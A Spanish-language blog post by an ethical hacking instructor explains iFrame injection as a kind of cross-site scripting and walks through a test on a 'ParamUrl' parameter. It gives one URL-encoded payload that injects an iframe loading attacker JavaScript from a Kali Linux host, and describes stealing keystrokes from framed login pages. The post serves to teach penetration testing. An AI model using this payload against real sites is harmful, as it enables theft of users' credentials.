Prueba de Inyección iFrame

  • Posted on: 19 January 2023
  • By: ReYDeS

Una marco en línea (inline frame) es utilizado para incrustar otro documento dentro del documento HTML actual. Es decir se puede utilizara para una página web HTML sea incrustada dentro de otra página web correspondiente a un sitio web. Esto permite la inclusión de contenido desde fuentes externas, como publicidad en páginas web. Una inyección iFrame XSS es un ataque común de Cross-Site Scripting, el cual combina JavaScript malicioso con un iframe el cual carga una página legítima con el propósito de robar datos de un usuario desprevenido.

Este ataque frecuentemente tiene éxito cuando se combina con ingeniería social. Un ejemplo de ataque XSS por inyección de iFrame consistiría cuando un atacante convence al usuario para navegue hacia una página web controlada por el atacante. A continuación la página del atacante carga JavaScript malicioso en un iframe HTML el cual apunta hacia un sitio legítimo. Una vez que el usuario introduce sus credenciales en el sitio legítimo dentro del iframe, el JavaScript malicioso roba las pulsaciones de teclado.

Al analizar la respuesta devuelta por la aplicación, se visualiza el parámetro de nombre “ParamUrl” define el valor “robots.txt”.

En el cuerpo de la respuesta se visualiza la utilización de la etiqueta iframe para mostrar el contenido del archivo “robots.txt”

Para descubrir la la vulnerabilidad se cambia el valor del parámetro de nombre “ParamUrl” a lo siguiente:

robots.txt&ParamWidth=250&ParamHeight=250%22%3E%3C/iframe%3E%3Ciframe%20src=%22http://192.168.0.80/j.html%22%3E

La dirección corresponde a un servidor web ejecutándose en Kali Linux. El archivo de nombre “j.html” contiene el codigo JavaScript a ejecutar.

Se ha identificado y explotado exitosamente una inyección iFrame.

Fuentes:

https://www.radware.com/cyberpedia/application-security/iframe-injection...
https://www.w3schools.com/tags/tag_iframe.ASP

Sobre el Autor


Alonso Eduardo Caballero Quezada - ReYDeS
Instructor y Consultor en Hacking Ético, Forense Digital & GNU/Linux
Correo Electrónico: ReYDeS@gmail.com
Twitter: https://twitter.com/Alonso_ReYDeS
LinkedIn: https://pe.linkedin.com/in/alonsocaballeroquezada/
Facebook: https://www.facebook.com/alonsoreydes
Youtube: https://www.youtube.com/c/AlonsoCaballero
Resumen de mi CV: https://www.reydes.com/d/?q=node/1